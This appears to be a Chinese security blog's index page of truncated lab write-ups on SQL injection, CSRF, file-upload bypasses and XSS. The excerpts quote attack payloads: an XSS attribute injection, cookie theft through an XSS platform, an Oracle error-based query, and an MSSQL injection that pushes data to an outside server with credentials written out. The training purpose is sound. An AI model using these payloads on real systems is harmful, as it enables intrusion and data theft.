SQL注入
一、 SQL注入原理二、 SQL注入的类型三、 SQL注入的危害四、 数据库之间的一些小区别五、 判断数据库六 手工注入的基本流程1. 判断注入点2. 获取字段数3. 数据库注入联合注入MySQLGETPOSTMssqlOracleACCESS报错注入MySQL报错注入Mssql报错注入Oracle报错注入布尔盲注MySQL布尔盲注Mssql布尔盲注Oracle布尔盲注ACCESS布尔盲注延时注入
维他柠檬茶 CSRF跨站伪造请求
9.4、CSRF跨站伪造请求靶场是DedeCMS_V57_UTF8_SP1 (Dedecms v5.7 sp1);我们可以通过百度查一下通杀CMS的漏洞(https://xz.aliyun.com/t/2237)readfile() 函数输出一个文件。该函数读入一个文件并写入到输出缓冲。若成功,则返回从文件中读入的字节数。若失败,则返回 false。您可以通过 @readfile() 形式调用该函
维他柠檬茶 文件上传20-23
pass-20IIS6.0解析漏洞(一): IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx 也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx 都会调用 asp.dll它允许asa,cer,cdx后缀的文件上传,但它对内容进行了
维他柠檬茶 文件上传11-19
了解%00实际上我们要先了解0x00,0x00实际上是一个十六进制表示方式,实际上就是表示ascii码值为0,有些函数在处理这个字符的时候会把这个字符当做结束符,他们就读取到这里认为这一段结束假如我写了1.php%00.jpg 传参之后,有些过滤都是直接匹配字符串,他强行匹配到了结尾是.jpg,然后允许上传,但是php的函数去执行的时候他读取到0x00认为结束了,那么这个文件就变成了1
维他柠檬茶 文件上传1-10
pass-01前端验证绕过Pass-01:(最不可靠的前端验证) 看题目就知道是前端验证,直接抓包搞定,先上传一个jpg然后抓包改成php就行Pass-02:(Content-Type方式绕过) 既然是检查文件类型,拿出我们的图片马,WEB容器是根据后缀来识别格式的,我只要上传的文件后缀是.php就行将图片马上传他的类型是图片
维他柠檬茶 DOM XSS靶场
DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不
维他柠檬茶 存储型Xss靶场
持久型/存储型XSS:嵌入到web页面的恶意HTML会被存储到应用服务器端,简而言之就是会被存储到数据库,等用户在打开页面时,会继续执行恶意代码,能够持续的攻击用户; 因为XSS payload构建复杂,所以一般情况下我们都是使用XSS平台去获取cookie (http://xss.tf)9.2、存储型
维他柠檬茶 反射型XSS靶场
oninput (有输入框,输入的时候触发)9.1、反射型XSS靶场见框就插;插入" oninput=alert'123' //没有弹窗,看下f12双引号被过滤掉了,那么我们试试单引号;输入单引号不会被过滤还能成功的执行;' oninput=alert(123) //成功弹窗拿到flag;
维他柠檬茶 5.4.1、Oracle注入- 报错注入
CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) 去查询关于主题的对应关键词,然后因为查询失败(应该是这个用户没有创建和查询的权限,默认情况没有创建,爆出未查询到的错误从而爆出查询的内容)rownum=1 输入一行数据select * from user_tables 查询出当前用户的表select*from
维他柠檬茶 MSSQL注入 - 反弹注入
insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14A87F7_saddsa454_admin;pwd=saddsa454;database=DB_14A87F7_saddsa454').DB_14A87F7_saddsa454.dbo.a select * f